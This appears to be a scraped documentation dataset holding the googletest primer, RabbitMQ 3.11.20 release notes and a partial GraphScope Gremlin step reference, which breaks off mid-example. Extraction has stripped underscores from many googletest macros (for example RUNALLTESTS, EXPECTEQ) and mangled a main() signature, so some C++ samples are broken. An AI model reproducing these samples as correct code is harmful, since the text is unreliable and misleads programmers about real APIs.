[ { "data": "googletest helps you write better C++ tests. googletest is a testing framework developed by the Testing Technology team with Google's specific requirements and constraints in mind. No matter whether you work on Linux, Windows, or a Mac, if you write C++ code, googletest can help you. And it supports any kind of tests, not just unit tests. So what makes a good test, and how does googletest fit in? We believe: Tests should be independent and repeatable. It's a pain to debug a test that succeeds or fails as a result of other tests. googletest isolates the tests by running each of them on a different object. When a test fails, googletest allows you to run it in isolation for quick debugging. Tests should be well organized and reflect the structure of the tested code. googletest groups related tests into test cases that can share data and subroutines. This common pattern is easy to recognize and makes tests easy to maintain. Such consistency is especially helpful when people switch projects and start to work on a new code base. Tests should be portable and reusable. Google has a lot of code that is platform-neutral, its tests should also be platform-neutral. googletest works on different OSes, with different compilers (gcc, icc, and MSVC), with or without exceptions, so googletest tests can easily work with a variety of configurations. When tests fail, they should provide as much information about the problem as possible. googletest doesn't stop at the first test failure. Instead, it only stops the current test and continues with the next. You can also set up tests that report non-fatal failures after which the current test continues. Thus, you can detect and fix multiple bugs in a single run-edit-compile cycle. The testing framework should liberate test writers from housekeeping chores and let them focus on the test content. googletest automatically keeps track of all tests defined, and doesn't require the user to enumerate them in order to run them. Tests should be fast. With googletest, you can reuse shared resources across tests and pay for the set-up/tear-down only once, without making tests depend on each other. Since googletest is based on the popular xUnit architecture, you'll feel right at home if you've used JUnit or PyUnit before. If not, it will take you about 10 minutes to learn the basics and get started. So let's go! Note: There might be some confusion of idea due to different definitions of the terms Test, Test Case and Test Suite, so beware of misunderstanding these. Historically, googletest started to use the term Test Case for grouping related tests, whereas current publications including the International Software Testing Qualifications Board () and various textbooks on Software Quality use the term _[Test Suite](http://glossary.istqb.org/search/test%20suite)_ for this. The related term Test, as it is used in the googletest, is corresponding to the term of ISTQB and others. The term Test is commonly of broad enough sense, including ISTQB's definition of Test Case, so it's not much of a problem here. But the term Test Case as was used in Google Test is of contradictory sense and thus confusing. googletest recently started replacing the term Test Case by Test Suite The preferred API is" }, { "data": "The older TestCase API is being slowly deprecated and refactored away So please be aware of the different definitions of the terms: Meaning | googletest Term | Term :-- | : | :- Exercise a particular program path with specific input values and verify the results | | When using googletest, you start by writing assertions, which are statements that check whether a condition is true. An assertion's result can be success, nonfatal failure, or fatal failure. If a fatal failure occurs, it aborts the current function; otherwise the program continues normally. Tests use assertions to verify the tested code's behavior. If a test crashes or has a failed assertion, then it fails; otherwise it succeeds. A test case contains one or many tests. You should group your tests into test cases that reflect the structure of the tested code. When multiple tests in a test case need to share common objects and subroutines, you can put them into a test fixture class. A test program can contain multiple test cases. We'll now explain how to write a test program, starting at the individual assertion level and building up to tests and test cases. googletest assertions are macros that resemble function calls. You test a class or function by making assertions about its behavior. When an assertion fails, googletest prints the assertion's source file and line number location, along with a failure message. You may also supply a custom failure message which will be appended to googletest's message. The assertions come in pairs that test the same thing but have different effects on the current function. `ASSERT_*` versions generate fatal failures when they fail, and abort the current function. `EXPECT_*` versions generate nonfatal failures, which don't abort the current function. Usually `EXPECT_*` are preferred, as they allow more than one failure to be reported in a test. However, you should use `ASSERT_*` if it doesn't make sense to continue when the assertion in question fails. Since a failed `ASSERT_*` returns from the current function immediately, possibly skipping clean-up code that comes after it, it may cause a space leak. Depending on the nature of the leak, it may or may not be worth fixing - so keep this in mind if you get a heap checker error in addition to assertion errors. To provide a custom failure message, simply stream it into the macro using the `<<` operator, or a sequence of such operators. An example: ```c++ ASSERT_EQ(x.size(), y.size()) << \"Vectors x and y are of unequal length\"; for (int i = 0; i < x.size(); ++i) { EXPECT_EQ(x[i], y[i]) << \"Vectors x and y differ at index \" << i; } ``` Anything that can be streamed to an `ostream` can be streamed to an assertion macro--in particular, C strings and `string` objects. If a wide string (`wchar_t`, `TCHAR` in `UNICODE` mode on Windows, or `std::wstring`) is streamed to an assertion, it will be translated to UTF-8 when printed. These assertions do basic true/false condition testing. Fatal assertion | Nonfatal assertion | Verifies -- | -- | -- `ASSERTTRUE(condition);` | `EXPECTTRUE(condition);` | `condition` is true `ASSERTFALSE(condition);` | `EXPECTFALSE(condition);` | `condition` is false Remember, when they fail, `ASSERT_*` yields a fatal failure and returns from the current function, while `EXPECT_*` yields a nonfatal failure, allowing the function to continue running. In either case, an assertion failure means its containing test fails. Availability: Linux, Windows, Mac. This section describes assertions that compare two" }, { "data": "Fatal assertion | Nonfatal assertion | Verifies | | -- `ASSERTEQ(val1, val2);` | `EXPECTEQ(val1, val2);` | `val1 == val2` `ASSERTNE(val1, val2);` | `EXPECTNE(val1, val2);` | `val1 != val2` `ASSERTLT(val1, val2);` | `EXPECTLT(val1, val2);` | `val1 < val2` `ASSERTLE(val1, val2);` | `EXPECTLE(val1, val2);` | `val1 <= val2` `ASSERTGT(val1, val2);` | `EXPECTGT(val1, val2);` | `val1 > val2` `ASSERTGE(val1, val2);` | `EXPECTGE(val1, val2);` | `val1 >= val2` Value arguments must be comparable by the assertion's comparison operator or you'll get a compiler error. We used to require the arguments to support the `<<` operator for streaming to an `ostream`, but it's no longer necessary. If `<<` is supported, it will be called to print the arguments when the assertion fails; otherwise googletest will attempt to print them in the best way it can. For more details and how to customize the printing of the arguments, see gMock .). These assertions can work with a user-defined type, but only if you define the corresponding comparison operator (e.g. `==`, `<`, etc). Since this is discouraged by the Google [C++ Style Guide](https://google.github.io/styleguide/cppguide.html#Operator_Overloading), you may need to use `ASSERTTRUE()` or `EXPECTTRUE()` to assert the equality of two objects of a user-defined type. However, when possible, `ASSERT_EQ(actual, expected)` is preferred to `ASSERT_TRUE(actual == expected)`, since it tells you `actual` and `expected`'s values on failure. Arguments are always evaluated exactly once. Therefore, it's OK for the arguments to have side effects. However, as with any ordinary C/C++ function, the arguments' evaluation order is undefined (i.e. the compiler is free to choose any order) and your code should not depend on any particular argument evaluation order. `ASSERT_EQ()` does pointer equality on pointers. If used on two C strings, it tests if they are in the same memory location, not if they have the same value. Therefore, if you want to compare C strings (e.g. `const char*`) by value, use `ASSERT_STREQ()`, which will be described later on. In particular, to assert that a C string is `NULL`, use `ASSERTSTREQ(cstring, NULL)`. Consider using `ASSERTEQ(cstring, nullptr)` if c++11 is supported. To compare two `string` objects, you should use `ASSERT_EQ`. When doing pointer comparisons use `_EQ(ptr, nullptr)` and `_NE(ptr, nullptr)` instead of `_EQ(ptr, NULL)` and `_NE(ptr, NULL)`. This is because `nullptr` is typed while `NULL` is not. See for more details. If you're working with floating point numbers, you may want to use the floating point variations of some of these macros in order to avoid problems caused by rounding. See for details. Macros in this section work with both narrow and wide string objects (`string` and `wstring`). Availability: Linux, Windows, Mac. Historical note: Before February 2016 `*_EQ` had a convention of calling it as `ASSERT_EQ(expected, actual)`, so lots of existing code uses this order. Now `*_EQ` treats both parameters in the same way. The assertions in this group compare two C strings. If you want to compare two `string` objects, use `EXPECTEQ`, `EXPECTNE`, and etc" }, { "data": "| Fatal assertion | Nonfatal assertion | Verifies | | - | - | -- | | `ASSERTSTREQ(str1, str2);` | `EXPECTSTREQ(str1, str2);` | the two C strings have the same content | | `ASSERTSTRNE(str1, str2);` | `EXPECTSTRNE(str1, str2);` | the two C strings have different contents | | `ASSERTSTRCASEEQ(str1, str2);` | `EXPECTSTRCASEEQ(str1, str2);` | the two C strings have the same content, ignoring case | | `ASSERTSTRCASENE(str1, str2);` | `EXPECTSTRCASENE(str1, str2);` | the two C strings have different contents, ignoring case | Note that \"CASE\" in an assertion name means that case is ignored. A `NULL` pointer and an empty string are considered different. `STREQ` and `STRNE` also accept wide C strings (`wchar_t*`). If a comparison of two wide strings fails, their values will be printed as UTF-8 narrow strings. Availability: Linux, Windows, Mac. See also: For more string comparison tricks (substring, prefix, suffix, and regular expression matching, for example), see in the Advanced googletest Guide. To create a test: Use the `TEST()` macro to define and name a test function, These are ordinary C++ functions that don't return a value. In this function, along with any valid C++ statements you want to include, use the various googletest assertions to check values. The test's result is determined by the assertions; if any assertion in the test fails (either fatally or non-fatally), or if the test crashes, the entire test fails. Otherwise, it succeeds. ```c++ TEST(TestSuiteName, TestName) { ... test body ... } ``` `TEST()` arguments go from general to specific. The first argument is the name of the test case, and the second argument is the test's name within the test case. Both names must be valid C++ identifiers, and they should not contain underscore (`_`). A test's full name consists of its containing test case and its individual name. Tests from different test cases can have the same individual name. For example, let's take a simple integer function: ```c++ int Factorial(int n); // Returns the factorial of n ``` A test case for this function might look like: ```c++ // Tests factorial of 0. TEST(FactorialTest, HandlesZeroInput) { EXPECT_EQ(Factorial(0), 1); } // Tests factorial of positive numbers. TEST(FactorialTest, HandlesPositiveInput) { EXPECT_EQ(Factorial(1), 1); EXPECT_EQ(Factorial(2), 2); EXPECT_EQ(Factorial(3), 6); EXPECT_EQ(Factorial(8), 40320); } ``` googletest groups the test results by test cases, so logically-related tests should be in the same test case; in other words, the first argument to their `TEST()` should be the same. In the above example, we have two tests, `HandlesZeroInput` and `HandlesPositiveInput`, that belong to the same test case `FactorialTest`. When naming your test cases and tests, you should follow the same convention as for [naming functions and classes](https://google.github.io/styleguide/cppguide.html#Function_Names). Availability: Linux, Windows, Mac. If you find yourself writing two or more tests that operate on similar data, you can use a test fixture. It allows you to reuse the same configuration of objects for several different tests. To create a fixture: Derive a class from `::testing::Test` . Start its body with `protected:` as we'll want to access fixture members from sub-classes. Inside the class, declare any objects you plan to use. If necessary, write a default constructor or `SetUp()` function to prepare the objects for each test. A common mistake is to spell `SetUp()` as `Setup()` with a small `u` - Use `override` in C++11 to make sure you spelled it correctly If necessary, write a destructor or `TearDown()` function to release any resources you allocated in `SetUp()` . To learn when you should use the constructor/destructor and when you should use `SetUp()/TearDown()`, read this entry. If needed, define subroutines for your tests to share. When using a fixture, use `TEST_F()` instead of `TEST()` as it allows you to access objects and subroutines in the test fixture: ```c++ TEST_F(TestSuiteName, TestName) { ... test body" }, { "data": "} ``` Like `TEST()`, the first argument is the test case name, but for `TEST_F()` this must be the name of the test fixture class. You've probably guessed: `_F` is for fixture. Unfortunately, the C++ macro system does not allow us to create a single macro that can handle both types of tests. Using the wrong macro causes a compiler error. Also, you must first define a test fixture class before using it in a `TEST_F()`, or you'll get the compiler error \"`virtual outside class declaration`\". For each test defined with `TEST_F()` , googletest will create a fresh test fixture at runtime, immediately initialize it via `SetUp()` , run the test, clean up by calling `TearDown()` , and then delete the test fixture. Note that different tests in the same test case have different test fixture objects, and googletest always deletes a test fixture before it creates the next one. googletest does not reuse the same test fixture for multiple tests. Any changes one test makes to the fixture do not affect other tests. As an example, let's write tests for a FIFO queue class named `Queue`, which has the following interface: ```c++ template <typename E> // E is the element type. class Queue { public: Queue(); void Enqueue(const E& element); E* Dequeue(); // Returns NULL if the queue is empty. size_t size() const; ... }; ``` First, define a fixture class. By convention, you should give it the name `FooTest` where `Foo` is the class being tested. ```c++ class QueueTest : public ::testing::Test { protected: void SetUp() override { q1_.Enqueue(1); q2_.Enqueue(2); q2_.Enqueue(3); } // void TearDown() override {} Queue<int> q0_; Queue<int> q1_; Queue<int> q2_; }; ``` In this case, `TearDown()` is not needed since we don't have to clean up after each test, other than what's already done by the destructor. Now we'll write tests using `TEST_F()` and this fixture. ```c++ TEST_F(QueueTest, IsEmptyInitially) { EXPECTEQ(q0.size(), 0); } TEST_F(QueueTest, DequeueWorks) { int* n = q0_.Dequeue(); EXPECT_EQ(n, nullptr); n = q1_.Dequeue(); ASSERT_NE(n, nullptr); EXPECT_EQ(*n, 1); EXPECTEQ(q1.size(), 0); delete n; n = q2_.Dequeue(); ASSERT_NE(n, nullptr); EXPECT_EQ(*n, 2); EXPECTEQ(q2.size(), 1); delete n; } ``` The above uses both `ASSERT*` and `EXPECT*` assertions. The rule of thumb is to use `EXPECT_*` when you want the test to continue to reveal more errors after the assertion failure, and use `ASSERT_*` when continuing after failure doesn't make sense. For example, the second assertion in the `Dequeue` test is =ASSERT_NE(nullptr, n)=, as we need to dereference the pointer `n` later, which would lead to a segfault when `n` is `NULL`. When these tests run, the following happens: googletest constructs a `QueueTest` object (let's call it `t1` ). `t1.SetUp()` initializes `t1` . The first test ( `IsEmptyInitially` ) runs on `t1` . `t1.TearDown()` cleans up after the test finishes. `t1` is destructed. The above steps are repeated on another `QueueTest` object, this time running the `DequeueWorks` test. Availability: Linux, Windows, Mac. `TEST()` and `TEST_F()` implicitly register their tests with googletest. So, unlike with many other C++ testing frameworks, you don't have to re-list all your defined tests in order to run them. After defining your tests, you can run them with `RUNALLTESTS()` , which returns `0` if all the tests are successful, or `1` otherwise. Note that `RUNALLTESTS()` runs all tests in your link unit -- they can be from different test cases, or even different source" }, { "data": "When invoked, the `RUNALLTESTS()` macro: Saves the state of all googletest flags Creates a test fixture object for the first test. Initializes it via `SetUp()`. Runs the test on the fixture object. Cleans up the fixture via `TearDown()`. Deletes the fixture. Restores the state of all googletest flags Repeats the above steps for the next test, until all tests have run. If a fatal failure happens the subsequent steps will be skipped. IMPORTANT: You must not ignore the return value of `RUNALLTESTS()`, or you will get a compiler error. The rationale for this design is that the automated testing service determines whether a test has passed based on its exit code, not on its stdout/stderr output; thus your `main()` function must return the value of `RUNALLTESTS()`. Also, you should call `RUNALLTESTS()` only once. Calling it more than once conflicts with some advanced googletest features (e.g. thread-safe [death tests](advanced.md#death-tests)) and thus is not supported. Availability: Linux, Windows, Mac. Write your own main() function, which should return the value of `RUNALLTESTS()` ```c++ namespace { // The fixture for testing class Foo. class FooTest : public ::testing::Test { protected: // You can remove any or all of the following functions if its body // is empty. FooTest() { // You can do set-up work for each test here. } ~FooTest() override { // You can do clean-up work that doesn't throw exceptions here. } // If the constructor and destructor are not enough for setting up // and cleaning up each test, you can define the following methods: void SetUp() override { // Code here will be called immediately after the constructor (right // before each test). } void TearDown() override { // Code here will be called immediately after each test (right // before the destructor). } // Objects declared here can be used by all tests in the test case for Foo. }; // Tests that the Foo::Bar() method does Abc. TEST_F(FooTest, MethodBarDoesAbc) { const std::string input_filepath = \"this/package/testdata/myinputfile.dat\"; const std::string output_filepath = \"this/package/testdata/myoutputfile.dat\"; Foo f; EXPECTEQ(f.Bar(inputfilepath, output_filepath), 0); } // Tests that Foo does Xyz. TEST_F(FooTest, DoesXyz) { // Exercises the Xyz feature of Foo. } } // namespace int main(int argc, char argv) { ::testing::InitGoogleTest(&argc, argv); return RUNALLTESTS(); } ``` The `::testing::InitGoogleTest()` function parses the command line for googletest flags, and removes all recognized flags. This allows the user to control a test program's behavior via various flags, which we'll cover in . You must call this function before calling `RUNALLTESTS()`, or the flags won't be properly initialized. On Windows, `InitGoogleTest()` also works with wide strings, so it can be used in programs compiled in `UNICODE` mode as well. But maybe you think that writing all those main() functions is too much work? We agree with you completely and that's why Google Test provides a basic implementation of main(). If it fits your needs, then just link your test with gtest\\_main library and you are good to go. NOTE: `ParseGUnitFlags()` is deprecated in favor of `InitGoogleTest()`. Google Test is designed to be thread-safe. The implementation is thread-safe on systems where the `pthreads` library is available. It is currently unsafe to use Google Test assertions from two threads concurrently on other systems (e.g. Windows). In most tests this is not an issue as usually the assertions are done in the main thread. If you want to help, you can volunteer to implement the necessary synchronization primitives in `gtest-port.h` for your platform." } ]
{ "category": "App Definition and Development", "file_name": "3.11.20.md", "project_name": "RabbitMQ", "subcategory": "Streaming & Messaging" }
[ { "data": "RabbitMQ `3.11.20` is a maintenance release in the `3.11.x` . Please refer to the upgrade section from if upgrading from a version prior to 3.11.0. This release requires Erlang 25 and supports Erlang versions up to `25.3.x`. has more details on Erlang version requirements for RabbitMQ. As of 3.11.0, RabbitMQ requires Erlang 25. Nodes will fail to start on older Erlang releases. Erlang 25 as our new baseline means much improved performance on ARM64 architectures, across all architectures, and the most recent TLS 1.3 implementation available to all RabbitMQ 3.11 users. Release notes can be found on GitHub at . Fixed a potential resource leak in at-least-once dead lettering from quorum queues. GitHub issue: A new command, `rabbitmqctl deactivatefreediskspacemonitoring`, can be used to (temporarily or permanently) disable free disk space monitoring on a node. To re-activate it, use `rabbitmqctl activatefreediskspacemonitoring`. GitHub issue: AMQP 1.0 clients that try to publish in a way that results in the message not being routed anywhere are now notified with a more sensible settlement status. GitHub issue: Prometheus scraping API endpoints now support optional authentication. Contributed by @SimonUnge (AWS). GitHub issue: The plugin now filters out values that are `undefined` or `NaN`, simply excluding them from the API endpoint response. Previously, if a metric was not computed for any reason (e.g. free disk space monitor was disabled on the node), its value could end up being rendered as `undefined` or `NaN`, two values that Prometheus scrapers cannot handle (for numerical types such as gauges). GitHub issue: It was not possible to close a table column selection pane on screens that had little vertical space. Contributed by @Antsthebul. GitHub issue: `ra` was upgraded to To obtain source code of the entire distribution, please download the archive named `rabbitmq-server-3.11.20.tar.xz` instead of the source tarball produced by GitHub." } ]
{ "category": "App Definition and Development", "file_name": "supported_gremlin_steps.md", "project_name": "GraphScope", "subcategory": "Database" }
[ { "data": "1. 3. 5. 7. 9. 11. 1. 3. This documentation guides you how to work with the graph traversal language in GraphScope. On the one hand we retain the original syntax of most steps from the standard Gremlin, on the other hand the usages of some steps are further extended to denote more complex situations in real-world scenarios. We retain the original syntax of the following steps from the standard Gremlin. The V()-step is meant to iterate over all vertices from the graph. Moreover, `vertexIds` can be injected into the traversal to select a subset of vertices. Parameters: </br> vertexIds - to select a subset of vertices from the graph, each id is of integer type. ```bash g.V() g.V(1) g.V(1,2,3) ``` The E()-step is meant to iterate over all edges from the graph. Moreover, `edgeIds` can be injected into the traversal to select a subset of edges. Parameters: </br> edgeIds - to select a subset of edges from the graph, each id is of integer type. ```bash g.E() g.E(1) g.E(1,2,3) ``` Map the vertex to its outgoing incident edges given the edge labels. Parameters: </br> edgeLabels - the edge labels to traverse. ```bash g.V().outE(\"knows\") g.V().outE(\"knows\", \"created\") ``` Map the vertex to its incoming incident edges given the edge labels. Parameters: </br> edgeLabels - the edge labels to traverse. ```bash g.V().inE(\"knows\") g.V().inE(\"knows\", \"created\") ``` Map the vertex to its incident edges given the edge labels. Parameters: </br> edgeLabels - the edge labels to traverse. ```bash g.V().bothE(\"knows\") g.V().bothE(\"knows\", \"created\") ``` Map the vertex to its outgoing adjacent vertices given the edge labels. Parameters: </br> edgeLabels - the edge labels to traverse. ```bash g.V().out(\"knows\") g.V().out(\"knows\", \"created\") ``` Map the vertex to its incoming adjacent vertices given the edge labels. Parameters: </br> edgeLabels - the edge labels to traverse. ```bash g.V().in(\"knows\") g.V().in(\"knows\", \"created\") ``` Map the vertex to its adjacent vertices given the edge labels. Parameters: </br> edgeLabels - the edge labels to traverse. ```bash g.V().both(\"knows\") g.V().both(\"knows\", \"created\") ``` Map the edge to its outgoing/tail incident vertex. ```bash g.V().inE().outV() # = g.V().in() ``` Map the edge to its incoming/head incident vertex. ```bash g.V().outE().inV() # = g.V().out() ``` Map the edge to the incident vertex that was not just traversed from in the path history. ```bash g.V().bothE().otherV() # = g.V().both() ``` Map the edge to its incident vertices. ```bash g.V().outE().bothV() # both endpoints of the outgoing edges ``` The hasId()-step is meant to filter graph elements based on their identifiers. Parameters: </br> elementIds - identifiers of the elements. ```bash g.V().hasId(1) # = g.V(1) g.V().hasId(1,2,3) # = g.V(1,2,3) ``` The hasLabel()-step is meant to filter graph elements based on their labels. Parameters: </br> labels - labels of the elements. ```bash g.V().hasLabel(\"person\") g.V().hasLabel(\"person\", \"software\") ``` The has()-step is meant to filter graph elements by applying predicates on their properties. Parameters: </br> propertyKey - the key of the property to filter on for existence. ```bash g.V().has(\"name\") # find vertices containing property `name` ``` propertyKey - the key of the property to filter on, </br> value - the value to compare the accessor value to for equality. ```bash g.V().has(\"age\", 10) g.V().has(\"name\", \"marko\") g.E().has(\"weight\"," }, { "data": "``` propertyKey - the key of the property to filter on, </br> predicate - the filter to apply to the key's value. ```bash g.V().has(\"age\", P.eq(10)) g.V().has(\"age\", P.neq(10)) g.V().has(\"age\", P.gt(10)) g.V().has(\"age\", P.lt(10)) g.V().has(\"age\", P.gte(10)) g.V().has(\"age\", P.lte(10)) g.V().has(\"age\", P.within([10, 20])) g.V().has(\"age\", P.without([10, 20])) g.V().has(\"age\", P.inside(10, 20)) g.V().has(\"age\", P.outside(10, 20)) g.V().has(\"age\", P.not(P.eq(10))) # = g.V().has(\"age\", P.neq(10)) g.V().has(\"name\", TextP.startingWith(\"mar\")) g.V().has(\"name\", TextP.endingWith(\"rko\")) g.V().has(\"name\", TextP.containing(\"ark\")) g.V().has(\"name\", TextP.notStartingWith(\"mar\")) g.V().has(\"name\", TextP.notEndingWith(\"rko\")) g.V().has(\"name\", TextP.notContaining(\"ark\")) ``` label - the label of the Element, </br> propertyKey - the key of the property to filter on, </br> value - the value to compare the accessor value to for equality. ```bash g.V().has(\"person\", \"id\", 1) # = g.V().hasLabel(\"person\").has(\"id\", 1) ``` label - the label of the Element, </br> propertyKey - the key of the property to filter on, </br> predicate - the filter to apply to the key's value. ```bash g.V().has(\"person\", \"age\", P.eq(10)) # = g.V().hasLabel(\"person\").has(\"age\", P.eq(10)) ``` The hasNot()-step is meant to filter graph elements based on the non-existence of properties. Parameters: </br> propertyKey - the key of the property to filter on for non-existence. ```bash g.V().hasNot(\"age\") # find vertices not-containing property `age` ``` The is()-step is meant to filter the object if it is unequal to the provided value or fails the provided predicate. Parameters: </br> value - the value that the object must equal. ```bash g.V().out().count().is(1) ``` predicate - the filter to apply. ```bash g.V().out().count().is(P.eq(1)) ``` The where(traversal)-step is meant to filter the current object by applying it to the nested traversal. Parameters: </br> whereTraversal - the traversal to apply. ```bash g.V().where(out().count()) g.V().where(out().count().is(gt(0))) ``` The where(predicate)-step is meant to filter the traverser based on the predicate acting on different tags. Parameters: </br> predicate - the predicate containing another tag to apply. ```bash g.V().as(\"a\").out().out().where(P.eq(\"a\")) ``` startKey - the tag containing the object to filter, </br> predicate - the predicate containing another tag to apply. ```bash g.V().as(\"a\").out().out().as(\"b\").where(\"b\", P.eq(\"a\")) ``` The by() can be applied to a number of different steps to alter their behaviors. Here are some usages of the modulated by()-step after a where-step: empty - this form is essentially an identity() modulation. ```bash g.V().as(\"a\").out().out().as(\"b\").where(\"b\", P.eq(\"a\")).by() ``` propertyKey - filter by the property value of the specified tag given the property key. ```bash g.V().as(\"a\").out().out().as(\"b\").where(\"b\", P.eq(\"a\")).by(\"name\") ``` traversal - filter by the computed value after applying the specified tag to the nested traversal. ```bash g.V().as(\"a\").out().out().as(\"b\").where(\"b\", P.eq(\"a\")).by(out().count()) ``` The not()-step is opposite to the where()-step and removes objects from the traversal stream when the traversal provided as an argument does not return any objects. Parameters: </br> notTraversal - the traversal to filter by. ```bash g.V().not(out().count()) g.V().not(out().count().is(gt(0))) ``` Remove all duplicates in the traversal stream up to this point. Parameters: dedupLabels - composition of the given labels determines de-duplication. No labels implies current object. ```bash g.V().dedup() g.V().as(\"a\").out().dedup(\"a\") # dedup by entry `a` g.V().as(\"a\").out().as(\"b\").dedup(\"a\", \"b\") # dedup by the composition of entry `a` and `b` ``` Usages of the modulated by()-step: </br> propertyKey - dedup by the property value of the current object or the specified tag given the property key. ```bash g.V().dedup().by(\"name\") g.V().as(\"a\").out().dedup(\"a\").by(\"name\") ``` token - dedup by the token value of the current object or the specified tag. ```bash g.V().dedup().by(T.id) g.V().dedup().by(T.label) g.V().as(\"a\").out().dedup(\"a\").by(T.id) g.V().as(\"a\").out().dedup(\"a\").by(T.label) ``` traversal - dedup by the computed value after applying the current object or the specified tag to the nested traversal. ```bash g.V().dedup().by(out().count())" }, { "data": "``` The id()-step is meant to map the graph element to its identifier. ```bash g.V().id() ``` The label()-step is meant to map the graph element to its label. ```bash g.V().label() ``` The constant()-step is meant to map any object to a fixed object value. Parameters: </br> value - a fixed object value. ```bash g.V().constant(1) g.V().constant(\"marko\") g.V().constant(1.0) ``` The valueMap()-step is meant to map the graph element to a map of the property entries according to their actual properties. If no property keys are provided, then all property values are retrieved. Parameters: </br> propertyKeys - the properties to retrieve. ```bash g.V().valueMap() g.V().valueMap(\"name\") g.V().valueMap(\"name\", \"age\") ``` The values()-step is meant to map the graph element to the values of the associated properties given the provide property keys. Here we just allow only one property key as the argument to the `values()` to implement the step as a map instead of a flat-map, which may be a little different from the standard Gremlin. Parameters: </br> propertyKey - the property to retrieve its value from. ```bash g.V().values(\"name\") ``` The elementMap()-step is meant to map the graph element to a map of T.id, T.label and the property values according to the given keys. If no property keys are provided, then all property values are retrieved. ``` Parameters: </br> propertyKeys - the properties to retrieve. ```bash g.V().elementMap() g.V().elementMap(\"name\") g.V().elementMap(\"name\", \"age\") ``` The select()-step is meant to map the traverser to the object specified by the selectKey or to a map projection of sideEffect values. Parameters: </br> selectKeys - the keys to project. ```bash g.V().as(\"a\").select(\"a\") g.V().as(\"a\").out().as(\"b\").select(\"a\", \"b\") ``` Usages of the modulated by()-step: </br> empty - an identity() modulation. ```bash g.V().as(\"a\").select(\"a\").by() g.V().as(\"a\").out().as(\"b\").select(\"a\", \"b\").by().by() ``` token - project the token value of the specified tag. ```bash g.V().as(\"a\").select(\"a\").by(T.id) g.V().as(\"a\").select(\"a\").by(T.label) ``` propertyKey - project the property value of the specified tag given the property key. ```bash g.V().as(\"a\").select(\"a\").by(\"name\") ``` traversal - project the computed value after applying the specified tag to the nested traversal. ```bash g.V().as(\"a\").select(\"a\").by(valueMap(\"name\", \"id\")) g.V().as(\"a\").select(\"a\").by(out().count()) ``` Count the number of traverser(s) up to this point. ```bash g.V().count() ``` Rolls up objects in the stream into an aggregate list. ```bash g.V().limit(10).fold() ``` Sum the traverser values up to this point. ```bash g.V().values(\"age\").sum() ``` Determines the minimum value in the stream. ```bash g.V().values(\"age\").min() ``` Determines the maximum value in the stream. ```bash g.V().values(\"age\").max() ``` Compute the average value in the stream. ```bash g.V().values(\"age\").mean() ``` Organize objects in the stream into a Map. Calls to group() are typically accompanied with by() modulators which help specify how the grouping should occur. Usages of the key by()-step: empty - group the elements in the stream by the current value. ```bash g.V().group().by() # = g.V().group() ``` propertyKey - group the elements in the stream by the property value of the current object given the property key. ```bash g.V().group().by(\"name\") ``` traversal - group the elements in the stream by the computed value after applying the current object to the nested traversal. ```bash g.V().group().by(values(\"name\")) # = g.V().group().by(\"name\") g.V().group().by(out().count()) ``` Usages of the value by()-step: empty - fold elements in each group into a list, which is a default behavior. ```bash g.V().group().by().by() # = g.V().group() ``` propertyKey - for each element in the group, get their property values according to the given" }, { "data": "```bash g.V().group().by().by(\"name\") ``` aggregateFunc - aggregate function to apply in each group. ```bash g.V().group().by().by(count()) g.V().group().by().by(fold()) g.V().group().by().by(values(\"name\").fold()) # = g.V().group().by().by(\"name\") g.V().group().by().by(values(\"age\").sum()) g.V().group().by().by(values(\"age\").min()) g.V().group().by().by(values(\"age\").max()) g.V().group().by().by(values(\"age\").mean()) g.V().group().by().by(dedup().count()) g.V().group().by().by(dedup().fold()) ``` Counts the number of times a particular objects has been part of a traversal, returning a map where the object is the key and the value is the count. Usages of the key by()-step: empty - group the elements in the stream by the current value. ```bash g.V().groupCount().by() # = g.V().groupCount() ``` propertyKey - group the elements in the stream by the property value of the current object given the property key. ```bash g.V().groupCount().by(\"name\") ``` traversal - group the elements in the stream by the computed value after applying the current object to the nested traversal. ```bash g.V().groupCount().by(values(\"name\")) # = g.V().groupCount().by(\"name\") g.V().groupCount().by(out().count()) ``` Order all the objects in the traversal up to this point and then emit them one-by-one in their ordered sequence. Usages of the modulated by()-step: </br> empty - order by the current object in ascending order, which is a default behavior. ```bash g.V().order().by() # = g.V().order() ``` order - the comparator to apply typically for some order (asc | desc | shuffle). ```bash g.V().order().by(Order.asc) # = g.V().order() g.V().order().by(Order.desc) ``` propertyKey - order by the property value of the current object given the property key. ```bash g.V().order().by(\"name\") # default order is asc g.V().order().by(\"age\") ``` traversal - order by the computed value after applying the current object to the nested traversal. ```bash g.V().order().by(out().count()) # default order is asc ``` propertyKey - order by the property value of the current object given the property key, </br> order - the comparator to apply typically for some order. ```bash g.V().order().by(\"name\", Order.desc) ``` traversal - order by the computed value after applying the current object to the nested traversal, </br> order - the comparator to apply typically for some order. ```bash g.V().order().by(out().count(), Order.desc) ``` Filter the objects in the traversal by the number of them to pass through the stream, where only the first n objects are allowed as defined by the limit argument. Parameters: </br> limit - the number at which to end the stream. ```bash g.V().limit(10) ``` Filter the object in the stream given a biased coin toss. Parameters: </br> probability - the probability that the object will pass through. ```bash g.V().coin(0.2) # range is [0.0, 1.0] g.V().out().coin(0.2) ``` Generate a certain number of sample results. Parameters: </br> number - allow specified number of objects to pass through the stream. ```bash g.V().sample(10) g.V().out().sample(10) ``` Merges the results of an arbitrary number of traversals. Parameters: </br> unionTraversals - the traversals to merge. ```bash g.V().union(out(), out().out()) ``` The match()-step provides a declarative form of graph patterns to match with. With match(), the user provides a collection of \"sentences,\" called patterns, that have variables defined that must hold true throughout the duration of the match(). For most of the complex graph patterns, it is usually much easier to express via match() than with single-path traversals. Parameters: </br> matchSentences - define a collection of patterns. Each pattern consists of a start tag, a serials of Gremlin steps (binders) and an end tag. Supported binders within a pattern: </br> Expand: in()/out()/both(), inE()/outE()/bothE(), inV()/outV()/otherV/bothV PathExpand Filter: has()/not()/where ```bash g.V().match(.as(\"a\").out().as(\"b\"), .as(\"b\").out().as(\"c\")) g.V().match(.as(\"a\").out().out().as(\"b\")," }, { "data": "g.V().match(.as(\"a\").out().out().as(\"b\"), not(.as(\"a\").out().as(\"b\"))) g.V().match(.as(\"a\").out().has(\"name\", \"marko\").as(\"b\"), .as(\"b\").out().as(\"c\")) ``` An edge-induced subgraph extracted from the original graph. Parameters: </br> graphName - the name of the side-effect key that will hold the subgraph. ```bash g.E().subgraph(\"all\") g.V().has('name', \"marko\").outE(\"knows\").subgraph(\"partial\") ``` The identity()-step maps the current object to itself. ```bash g.V().identity().values(\"id\") g.V().hasLabel(\"person\").as(\"a\").identity().values(\"id\") g.V().has(\"name\", \"marko\").union(identity(), 